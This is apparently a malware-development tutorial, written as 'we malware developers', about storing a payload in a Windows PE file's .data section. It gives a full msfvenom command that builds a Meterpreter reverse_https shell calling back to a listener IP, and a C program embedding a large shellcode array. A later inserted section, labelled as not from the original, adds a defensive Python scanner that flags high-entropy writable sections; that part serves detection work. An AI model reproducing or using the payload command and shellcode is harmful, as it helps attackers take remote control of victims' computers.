In the Portable Executable (PE) file structure, we malware developers have a few options for where to store the payload.

Payload Placement in .data Section

What is the .data Section in the PE File Structure?

The .data section holds a program's initialized global and static variables; it is mapped readable and writable but not executable. An initialized, non-const global array such as the shellcode buffer below is therefore placed there by the compiler (a const array would land in .rdata instead).

First, let's generate the payload with Msfvenom:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.12 LPORT=443 -f c -v shellcode -b "\x00"


Now let's write a C program that stores the malicious payload in the .data section of the PE structure:

#include <stdio.h>
#include <stdlib.h>   // EXIT_SUCCESS
#include <Windows.h>
// Hello I'm the payload nice to meet you!
// I'm stored at the Data Section Here!
// Generated with:
// msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.12 LPORT=443 -f c -v shellcode -b "\x00"
// Non-const initialized global: the compiler and linker place it in the .data section.
unsigned char shellcode[] =
"\xb8\xc9\xe3\x83\xe1\xdb\xcc\xd9\x74\x24\xf4\x5a\x31\xc9"
"\xb1\x8a\x83\xc2\x04\x31\x42\x10\x03\x42\x10\x2b\x16\x7f"
"\x09\x24\xd9\x80\xca\x5a\xeb\x52\x43\x7f\x6f\xd8\x06\x4f"
"\xfb\x8c\xaa\x24\xa9\x24\xbc\x8d\x04\x63\xf3\x0e\x13\x19"
"\xdb\xc1\xe4\x72\x27\x40\x99\x88\x74\xa2\xa0\x42\x89\xa3"
"\xe5\x14\xe7\x4c\xbb\x2d\x55\x82\xb7\x70\x66\xa3\x17\xff"
"\xd6\xdb\x12\xc0\x80\x6f\x51\xc0\xfe\x04\x31\xe2\xff\xc9"
"\x49\xaa\xe7\xbd\xc8\xe2\x6c\x01\xe2\x0b\xc5\xf2\x30\x7f"
"\xd7\xd2\x08\xbf\x19\x15\x67\x93\x9b\x6e\x40\x0b\xee\x84"
"\xb2\xb6\xe9\x5f\xc8\x6c\x7f\x7f\x6a\xe6\x27\x5b\x8a\x2b"
"\xb1\x28\x80\x80\xb5\x76\x85\x17\x19\x0d\xb1\x9c\x9c\xc1"
"\x33\xe6\xba\xc5\x18\xbc\xa3\x5c\xc5\x13\xdb\xbe\xa1\xcc"
"\x79\xb5\x40\x1a\xfd\x36\x9b\x23\xa3\xa0\x0a\xb9\x28\x30"
"\xbb\x36\xb8\x5e\x52\xed\x52\xd2\xd3\x2b\xa4\x15\xce\x05"
"\x71\xba\xa2\x36\xd6\x6f\xad\xca\xd8\x8f\x2d\x60\xb6\xf5"
"\x44\x16\x24\x68\xb8\xd3\x9a\x5a\xe6\x33\xae\xfb\x85\x2a"
"\x5e\x8f\x26\xde\xf6\x54\x99\x69\x69\xde\xbc\x05\x55\x53"
"\x5e\xb5\xb5\x24\xf3\x19\xee\x9a\xc2\x6a\x51\xeb\x0d\xad"
"\x2c\x7b\x3e\xc1\xcb\x2c\xdb\x7b\x5f\xbb\x57\x53\x69\x0b"
"\xad\x85\xa4\x45\xfc\xec\xe6\xb1\xb5\x46\xb3\x8c\x05\x7b"
"\x1b\x62\xff\xe8\x3e\x5a\xb8\x8b\xa3\xf1\x29\x7d\x04\x53"
"\xd3\x0f\x37\x32\x74\x9e\x98\xf5\xbc\x70\xd6\xd5\x93\xed"
"\x7e\x74\x66\x87\x51\x40\xb6\x62\x80\x9d\x98\xbd\xe9\xdd"
"\x8c\x87\x47\xa4\xeb\x07\xb2\x05\xa7\x9d\x3e\xfa\x14\x0a"
"\xfa\xfd\x9a\xca\x14\x36\x9a\xca\xe4\xe7\xee\xae\xa7\x8d"
"\x4f\x4c\x44\x06\x40\xa2\xd1\x8c\xcc\x80\xa0\x1a\x68\x36"
"\x04\xc3\x43\x5f\xd3\x47\x9c\xf5\x6b\x2e\x94\x67\x38\xd6"
"\x69\x2e\xa7\x57\x33\x94\x6b\x0d\xda\x70\x3a\xe5\x2a\xb2"
"\x88\x7c\x2b\xf1\x6b\x24\x8a\xb6\x30\xe0\x55\x7f\xb7\x40"
"\x0e\x28\x3e\xff\x08\x29\x95\x76\x52\x85\x7e\x88\x69\xc2"
"\xfb\xdb\xde\x41\x53\x88\xb6\x0d\xb0\x7b\x19\xf5\xb9\x56"
"\xf3\x63\x4c\x07\x94\xf3\x63\xb7\x64\x7d\x63\xdd\x60\x2d"
"\x0e\x3e\x3f\xa5\xbb\x06\x21\xb3\xbb\x53\x0e\xef\x10\x08"
"\xe7\x67\xba\xa8\x1f\x03\x3b\x61\x9a\x33\xb6\x9d\xcd\x3b"
"\x2a\x9d\x0d\x54\x09\x6d\x38\x44\x6e\x58\x0c\xf1\x5c\x8a"
"\xda\xf9\x5e\x4a\xb7\xb9\x36\x4a\x57\x3a\xc7\x22\x57\x3a"
"\x87\xb2\x04\x52\x5f\x16\xf9\x47\xa0\x83\x6d\xd4\x0c\xa2"
"\x75\x8c\xda\xb4\x59\x33\x1b\xe7\xcf\x5b\x09\x91\x79\x79"
"\xd2\x48\xfc\xbe\x59\xbd\x74\x39\xa3\x82\x0e\x86\xd6\xe1"
"\x49\xc4\x46\x01\x02\x35\x87\x2e\xe4\xf0\x4a\xfe\x36\x35"
"\x93\xd0\x09\x17\xd2\x1e\x6a\xdc\xe4\xeb\xc8\x74\x6f\x13"
"\x5e\x86\xba";
int main(void)
{
    printf("Rem01x Malware Development Journey\n");
    // The printed address falls inside the .data section of the loaded image.
    printf("Hello I'm the Payload, my address is: 0x%p\n", (void *)shellcode);
    return EXIT_SUCCESS;
}


Now let's compile the code and open the resulting executable in PE-Bear to have a look at the .data section.
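As an added example (not from the original post), here is the defender-side counterpart to the PE-Bear inspection: a small Python parser that walks the section table the same way PE-Bear does, decodes each section's characteristics and scores the entropy of its raw bytes, because an encoded msfvenom blob sitting in the writable .data section stands out from the low-entropy globals normally found there. The sample PE bytes are constructed inline (headers plus two section bodies, not a runnable executable) and the 5.5 bits/byte threshold is an assumed triage cut-off, not a specification value.

```python
import math
import struct
# Section Characteristics bits from the PE/COFF specification
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

def entropy(data):
    """Shannon entropy in bits per byte; encoded shellcode typically scores near 8."""
    probs = [data.count(b) / len(data) for b in set(data)]
    return -sum(p * math.log2(p) for p in probs)

def parse_sections(pe):
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    nsections, opt_size = struct.unpack_from("<H12xH", pe, coff + 2)  # NumberOfSections, SizeOfOptionalHeader
    sections = []
    for i in range(nsections):
        name, _vsize, _vaddr, rsize, rptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", pe, coff + 20 + opt_size + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "writable": bool(flags & IMAGE_SCN_MEM_WRITE),
            "executable": bool(flags & IMAGE_SCN_MEM_EXECUTE),
            "entropy": round(entropy(pe[rptr:rptr + rsize]), 2),
        })
    return sections

def findings(sections, threshold=5.5):  # threshold is an assumed triage cut-off, not a spec value
    out = []
    for s in sections:
        if s["writable"] and s["executable"]:
            out.append(f"{s['name']}: writable and executable")
        elif s["writable"] and s["entropy"] > threshold:
            out.append(f"{s['name']}: high-entropy writable data ({s['entropy']} bits/byte)")
    return out

def build_sample_pe():
    """Constructed header-only PE (not runnable): .text of zeros, .data holding 64 distinct bytes."""
    def sec(name, vaddr, raw, rptr, flags):
        return struct.pack("<8sIIIIIIHHI", name, len(raw), vaddr, len(raw), rptr, 0, 0, 0, 0, flags)
    text_raw, data_raw = bytes(16), bytes(range(64))
    hdr_end = 0x40 + 4 + 20 + 2 * 40  # DOS stub + "PE\0\0" + COFF header + two section headers, no optional header
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)  # e_lfanew at offset 0x3C points at "PE\0\0"
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 0, 0x22)  # x64, 2 sections, SizeOfOptionalHeader = 0
    text = sec(b".text", 0x1000, text_raw, hdr_end, 0x60000020)       # CODE | EXECUTE | READ
    data = sec(b".data", 0x2000, data_raw, hdr_end + 16, 0xC0000040)  # INITIALIZED_DATA | READ | WRITE
    return dos + b"PE\0\0" + coff + text + data + text_raw + data_raw
```

Run `parse_sections` over a real compiled binary (read as bytes) to compare against PE-Bear's section view; the .data entry carrying the encoded buffer will score far above the threshold.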
